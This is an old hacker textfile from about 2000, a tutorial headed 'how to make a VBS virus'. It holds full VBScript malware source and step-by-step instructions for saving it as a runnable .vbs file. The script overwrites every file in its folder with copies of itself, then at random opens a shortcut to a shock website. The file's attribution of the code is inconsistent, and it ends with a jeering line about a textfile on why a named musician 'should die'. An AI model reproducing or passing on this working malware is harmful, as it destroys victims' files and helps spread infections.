              |                                        x  
 cRaZy    /          /  |    /          /        /     x  
 TeXt    /    |     /   |   /          /        /      x  
 FiLe   /     |    /    |  /          /        /       x  
  By:  /      |   /     | /          /        /        x
      /_____  |  /      |/          /        /         x
           /  |  \      |\         /        /          x
 00/01    /   |   \     | \       /______  /______     x
         /    |    \    |  \     /      / /      /     x
        /     |     \   |   \   /   ?  / /   ?  /      x
       /      |      \  |    \ /______/ /______/       x
copyright by sick66 15-8-00                            x
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
H O W  T O  M A K E  A  V B S  V I R US                X
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

hell-o

do you remember the i-love-you virus?
it was a winscript virus, the latest in virus technology
some virus writers thought that it was time for some new, modern languages
to write there virusses in.
one of those new languages is winscript. in this file i will give you
the 'malkavian' virus by -KD- i was also thinking about putting the i-love-you
virus here, but i don't think that would make jason scott happy, because
a lot of people will then get virus alerts due to my textfile!

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
T H E  M A L K A V I A N  V I R U S                     X
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
                                                        x
this virus shows a funny picture in infected browser    x
                                                        x
xxxxxxxxxxxxxxxxx CUT HERE xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

'pentagram
'------------------------------------------------
'VBS.=)
'Made By: sick66
'On 14-8-00
'With Notepad
'By sick66 (uv course an alias)
'Do NOT edit above this line!!!
'------------------------------------------------"
Dim pentagram, WshShell, FSO, VX, VirusLink
On Error Resume Next
Randomize
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WshShell = Wscript.CreateObject("Wscript.Shell")
pentagram = Wscript.ScriptFullName
VX = Left(pentagram, InStrRev(pentagram, "\"))
For Each target in FSO.GetFolder(VX).Files
  FSO.CopyFile pentagram, target.Name, 1
Next
If Int((2 * Rnd) + 1) = 1 Then
  MsgBox "HAIL TEXTFILES.COM", 4096 , "VBS.=)"
  Set VirusLink = WshShell.CreateShortcut("C:\WINDOWS\Favorites\pentagram.URL")
  VirusLink.TargetPath = "http://vagina.rotten.com/fidel/"
  VirusLink.Save
  WshShell.Run ("C:\WINDOWS\Favorites\pentagram.URL")
End If
'pentagram

xxxxxxxxxxxxxxxxx CUT HERE xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

follow these steps:

- right click with mouse on desktop
- select 'new'
- there you will see a list of files you can create, pick 'textfile'
- name it kewl, funny or something
- select al the code that's between the two 'cut here' lines
  so that it becomes blue or black
  (do NOT select the 'cut here' lines)  
- once selected press ctrl+c (control+c)
  or go to 'edit' and select 'copy'
- now open the new created textfile and press ctrl+v (control+v)
  or go to 'edit' and select 'paste'
- the code will now appear on the screen. 
  to make the virus work, go to 'file' and select 'save as'
  give it any name, but make sure that it ends in '.vbs'
  if you want to name it funny for instance, type 'funny.vbs'
  in the window where you have to specify the filename
  
  the virus is now ready for use!   

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
H O W  T O  C O N T A C T  M E:                             x
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

if you have any questions concerning my textfiles:

    my e-mail: sick66@chatplaza.nl
    

xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
look out for my new textfile on why eminem should die!


         de mazzel (that is dutch for see ya)

         -=*sick66*=-